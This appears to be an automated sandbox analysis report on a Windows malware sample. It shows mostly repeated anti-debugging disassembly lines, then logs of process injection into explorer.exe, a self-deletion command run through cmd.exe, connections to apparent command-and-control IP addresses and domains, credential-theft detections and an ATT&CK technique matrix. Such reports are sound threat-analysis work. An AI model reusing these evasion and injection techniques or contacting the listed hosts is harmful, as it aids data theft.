          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176E872 mov eax, dword ptr fs:[00000030h]2_2_0176E872
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176E872 mov eax, dword ptr fs:[00000030h]2_2_0176E872
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01776870 mov eax, dword ptr fs:[00000030h]2_2_01776870
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01776870 mov eax, dword ptr fs:[00000030h]2_2_01776870
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01710854 mov eax, dword ptr fs:[00000030h]2_2_01710854
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F2840 mov ecx, dword ptr fs:[00000030h]2_2_016F2840
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4859 mov eax, dword ptr fs:[00000030h]2_2_016E4859
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4859 mov eax, dword ptr fs:[00000030h]2_2_016E4859
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A830 mov eax, dword ptr fs:[00000030h]2_2_0171A830
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178483A mov eax, dword ptr fs:[00000030h]2_2_0178483A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178483A mov eax, dword ptr fs:[00000030h]2_2_0178483A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]2_2_01702835
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]2_2_01702835
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]2_2_01702835
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702835 mov ecx, dword ptr fs:[00000030h]2_2_01702835
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]2_2_01702835
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]2_2_01702835
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176C810 mov eax, dword ptr fs:[00000030h]2_2_0176C810
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C8F9 mov eax, dword ptr fs:[00000030h]2_2_0171C8F9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C8F9 mov eax, dword ptr fs:[00000030h]2_2_0171C8F9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AA8E4 mov eax, dword ptr fs:[00000030h]2_2_017AA8E4
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E8C0 mov eax, dword ptr fs:[00000030h]2_2_0170E8C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0887 mov eax, dword ptr fs:[00000030h]2_2_016E0887
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176C89D mov eax, dword ptr fs:[00000030h]2_2_0176C89D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DCB7E mov eax, dword ptr fs:[00000030h]2_2_016DCB7E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178EB50 mov eax, dword ptr fs:[00000030h]2_2_0178EB50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01794B4B mov eax, dword ptr fs:[00000030h]2_2_01794B4B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01794B4B mov eax, dword ptr fs:[00000030h]2_2_01794B4B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01776B40 mov eax, dword ptr fs:[00000030h]2_2_01776B40
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01776B40 mov eax, dword ptr fs:[00000030h]2_2_01776B40
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AAB40 mov eax, dword ptr fs:[00000030h]2_2_017AAB40
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01788B42 mov eax, dword ptr fs:[00000030h]2_2_01788B42
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170EB20 mov eax, dword ptr fs:[00000030h]2_2_0170EB20
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170EB20 mov eax, dword ptr fs:[00000030h]2_2_0170EB20
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A8B28 mov eax, dword ptr fs:[00000030h]2_2_017A8B28
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A8B28 mov eax, dword ptr fs:[00000030h]2_2_017A8B28
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]2_2_0175EB1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176CBF0 mov eax, dword ptr fs:[00000030h]2_2_0176CBF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170EBFC mov eax, dword ptr fs:[00000030h]2_2_0170EBFC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8BF0 mov eax, dword ptr fs:[00000030h]2_2_016E8BF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8BF0 mov eax, dword ptr fs:[00000030h]2_2_016E8BF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8BF0 mov eax, dword ptr fs:[00000030h]2_2_016E8BF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0BCD mov eax, dword ptr fs:[00000030h]2_2_016E0BCD
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0BCD mov eax, dword ptr fs:[00000030h]2_2_016E0BCD
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0BCD mov eax, dword ptr fs:[00000030h]2_2_016E0BCD
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178EBD0 mov eax, dword ptr fs:[00000030h]2_2_0178EBD0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01700BCB mov eax, dword ptr fs:[00000030h]2_2_01700BCB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01700BCB mov eax, dword ptr fs:[00000030h]2_2_01700BCB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01700BCB mov eax, dword ptr fs:[00000030h]2_2_01700BCB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01794BB0 mov eax, dword ptr fs:[00000030h]2_2_01794BB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01794BB0 mov eax, dword ptr fs:[00000030h]2_2_01794BB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0BBE mov eax, dword ptr fs:[00000030h]2_2_016F0BBE
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0BBE mov eax, dword ptr fs:[00000030h]2_2_016F0BBE
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175CA72 mov eax, dword ptr fs:[00000030h]2_2_0175CA72
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175CA72 mov eax, dword ptr fs:[00000030h]2_2_0175CA72
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178EA60 mov eax, dword ptr fs:[00000030h]2_2_0178EA60
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171CA6F mov eax, dword ptr fs:[00000030h]2_2_0171CA6F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171CA6F mov eax, dword ptr fs:[00000030h]2_2_0171CA6F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171CA6F mov eax, dword ptr fs:[00000030h]2_2_0171CA6F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0A5B mov eax, dword ptr fs:[00000030h]2_2_016F0A5B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0A5B mov eax, dword ptr fs:[00000030h]2_2_016F0A5B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]2_2_016E6A50
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01704A35 mov eax, dword ptr fs:[00000030h]2_2_01704A35
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01704A35 mov eax, dword ptr fs:[00000030h]2_2_01704A35
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171CA38 mov eax, dword ptr fs:[00000030h]2_2_0171CA38
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171CA24 mov eax, dword ptr fs:[00000030h]2_2_0171CA24
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170EA2E mov eax, dword ptr fs:[00000030h]2_2_0170EA2E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176CA11 mov eax, dword ptr fs:[00000030h]2_2_0176CA11
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171AAEE mov eax, dword ptr fs:[00000030h]2_2_0171AAEE
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171AAEE mov eax, dword ptr fs:[00000030h]2_2_0171AAEE
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01714AD0 mov eax, dword ptr fs:[00000030h]2_2_01714AD0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01714AD0 mov eax, dword ptr fs:[00000030h]2_2_01714AD0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0AD0 mov eax, dword ptr fs:[00000030h]2_2_016E0AD0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01736ACC mov eax, dword ptr fs:[00000030h]2_2_01736ACC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01736ACC mov eax, dword ptr fs:[00000030h]2_2_01736ACC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01736ACC mov eax, dword ptr fs:[00000030h]2_2_01736ACC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8AA0 mov eax, dword ptr fs:[00000030h]2_2_016E8AA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8AA0 mov eax, dword ptr fs:[00000030h]2_2_016E8AA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01736AA4 mov eax, dword ptr fs:[00000030h]2_2_01736AA4
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01718A90 mov edx, dword ptr fs:[00000030h]2_2_01718A90
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]2_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4A80 mov eax, dword ptr fs:[00000030h]2_2_017B4A80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01778D6B mov eax, dword ptr fs:[00000030h]2_2_01778D6B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0D59 mov eax, dword ptr fs:[00000030h]2_2_016E0D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0D59 mov eax, dword ptr fs:[00000030h]2_2_016E0D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0D59 mov eax, dword ptr fs:[00000030h]2_2_016E0D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]2_2_016E8D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]2_2_016E8D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]2_2_016E8D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]2_2_016E8D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]2_2_016E8D59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01768D20 mov eax, dword ptr fs:[00000030h]2_2_01768D20
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01798D10 mov eax, dword ptr fs:[00000030h]2_2_01798D10
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01798D10 mov eax, dword ptr fs:[00000030h]2_2_01798D10
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01714D1D mov eax, dword ptr fs:[00000030h]2_2_01714D1D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FAD00 mov eax, dword ptr fs:[00000030h]2_2_016FAD00
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.210 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.223.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.69.174 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.19.157.23 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.51 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 450000Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeMemory written: C:\Users\user\Desktop\GCeHcfCef8.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeThread register set: target process: 2592Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 2592Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GCeHcfCef8.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000003.3084610828.00000000088B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325736830.0000000004040000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000088B8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.3796083410.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1324536381.0000000000BB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1324357562.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3791650388.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanZw
          Source: explorer.exe, 00000003.00000002.3796083410.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1324536381.0000000000BB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.3796083410.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1324536381.0000000000BB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeQueries volume information: C:\Users\user\Desktop\GCeHcfCef8.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          Path Interception612
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          121
          Security Software Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol11
          Archive Collected Data
          Exfiltration Over Bluetooth4
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script612
          Process Injection
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common11
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials112
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job22
          Software Packing
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Timestomp
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1331069 Sample: GCeHcfCef8.exe Startdate: 24/10/2023 Architecture: WINDOWS Score: 100 34 www.zg9tywlubmftzw5ldzi0mdm.com 2->34 36 www.totalkfood.com 2->36 38 12 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Multi AV Scanner detection for domain / URL 2->44 46 Found malware configuration 2->46 48 11 other signatures 2->48 11 GCeHcfCef8.exe 3 2->11         started        signatures3 process4 signatures5 56 Tries to detect virtualization through RDTSC time measurements 11->56 58 Injects a PE file into a foreign processes 11->58 14 GCeHcfCef8.exe 11->14         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 40 1 14->17 injected process8 dnsIp9 28 www.nightoracle.com 103.224.212.210, 49721, 80 